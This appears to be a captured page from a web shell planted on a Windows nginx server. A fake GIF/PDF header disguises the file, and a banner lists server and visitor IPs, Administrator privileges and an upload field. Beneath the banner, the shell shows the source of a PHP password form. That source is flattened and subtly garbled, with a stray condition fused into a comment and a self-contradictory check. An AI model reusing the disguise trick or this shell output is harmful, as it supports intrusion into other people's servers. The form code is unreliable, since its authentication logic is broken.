GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/User/ |
Upload File : |
<? // User/passwordForm.phpinc // Displays the Password form. t_Begin(); // Begin TRACKing included file.$userRow['userId'] == 1 pageHeader("Password",'','encode'); if ( !isset($f['username']) ) $f['username'] = ''; if ( !isset($f['password']) ) $f['password'] = ''; if ( !isset($isAuthorized) ) { $legend = 'Please enter a new Password'; } else { if ( !isset($_SESSION['user']['userId']) && $_SESSION['user']['userId'] ) { $legend = '<span class="">No password entered. Enter a password and confirm.</span>'; } else { $legend = '<span class="">Password does not exist for user. Enter a new password to continue</span>'; } } sectionHeader(); ?> <fieldset><legend><?=$legend?></legend> <? if ( isset($f['passwordError'])) { ?> <span class="error"><?=$f['passwordError']?></span> <? } ?> <? if ( isset($f['passwordVerifyError'])) { if ( isset($f['passwordError'])) { ?><br><? } ?> <span class="error"><?=$f['passwordVerifyError']?></span> <? } ?> <table> <form name="form_password" action="<?=php_self()?>" method="post"> <input type="hidden" name="form" value="form_password"> <input type="hidden" name="uuid" value="<?=uuid()?>"> <input type="hidden" name="task" value="Password"> <input type="hidden" name="userId" value="<?=$userRow['userId']?>"> <tr> <td class="label">Password</td> <td class="left"><input type="password" name="password" id="id_pw" value="" maxlength="32" style="width:150px;"></td> </tr> <tr> <td class="label">Verify password</td> <td class="left"><input type="password"name="password2" id="id_pww" value="" maxlength="32" style="width:150px;"></td> </tr> <tr><td colspan="2" class="center"> <input type="submit" value="Add password"> </td></tr> </form> <tr><td class="halfspacer" colspan="2"></td></tr> </table> </fieldset> <? sectionFooter(); ?> <? t_End(); // End TRACKing included file. pageFooter(); ?>